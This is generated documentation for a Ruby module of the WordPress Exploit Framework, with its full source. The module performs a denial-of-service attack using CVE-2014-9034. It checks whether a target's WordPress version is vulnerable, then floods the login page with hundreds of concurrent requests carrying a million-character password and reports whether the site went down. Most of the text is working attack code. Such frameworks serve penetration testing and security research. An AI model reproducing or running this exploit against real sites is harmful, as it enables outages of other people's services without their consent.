class Wpxf::Auxiliary::LongPasswordDos
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 9 def initialize super update_info( name: 'Long Password DoS', desc: 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, '\ 'and 4.x before 4.0.1 allows remote attackers to cause a denial '\ 'of service via a long password that is improperly handled during '\ 'hashing.', author: [ 'Javier Nieto Arevalo', # Vulnerability disclosure 'Andres Rojas Guerrero', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['CVE', '2014-9034'], ['WPVDB', '7681'], ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034'] ], date: 'Nov 20 2014' ) register_options([ IntegerOption.new( name: 'pass_length', required: true, desc: 'Length of the password to use', default: 1_000_000 ), IntegerOption.new( name: 'max_requests', required: true, desc: 'Max number of requests to send', default: 200 ), IntegerOption.new( name: 'http_client_timeout', desc: 'Max wait time in seconds for HTTP responses', default: 5, required: true ), StringOption.new( name: 'username', desc: 'The username to attempt to login with', required: true, default: '' ), BooleanOption.new( name: 'validate_user', desc: 'Validate the specified username', required: true, default: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 81 def check target_version = wordpress_version vuln_ranges = [ [Gem::Version.new('0'), Gem::Version.new('3.7.5')], [Gem::Version.new('3.8'), Gem::Version.new('3.8.5')], [Gem::Version.new('3.9'), Gem::Version.new('3.9.3')], [Gem::Version.new('4.0'), Gem::Version.new('4.0.1')] ] return :unknown if target_version.nil? vuln_ranges.each do |range| if target_version >= range[0] && target_version < range[1] return :vulnerable end end :safe end
max_requests()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 73 def max_requests normalized_option_value('max_requests') end
pass_length()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 77 def pass_length normalized_option_value('pass_length') end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 101 def run return false unless super if should_validate_user? emit_info "Checking if user \"#{username}\" exists..." unless wordpress_user_exists?(username) emit_error 'The specified user does not exist, aborting operation.' return end end emit_info "Generating payload..." pass = Wpxf::Utility::Text.rand_alpha(pass_length) opts = { url: wordpress_url_login, method: :post, body: wordpress_login_post_body(username, pass) } emit_info "Preparing #{max_requests} requests..." complete_requests = 0 max_requests.times do queue_request(opts) do |res| complete_requests += 1 emit_warning("#{complete_requests} requests executed") if complete_requests % 10 == 0 end end emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads" execute_queued_requests emit_success 'Finished executing requests' if wordpress_and_online? emit_error "FAILED: #{full_uri} appears to still be online" return false else emit_success "#{full_uri} appears to be down" return true end end
should_validate_user?()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 65 def should_validate_user? normalized_option_value('validate_user') end
username()
click to toggle source
# File lib/wpxf/modules/auxiliary/dos/long_password_dos.rb, line 69 def username normalized_option_value('username') end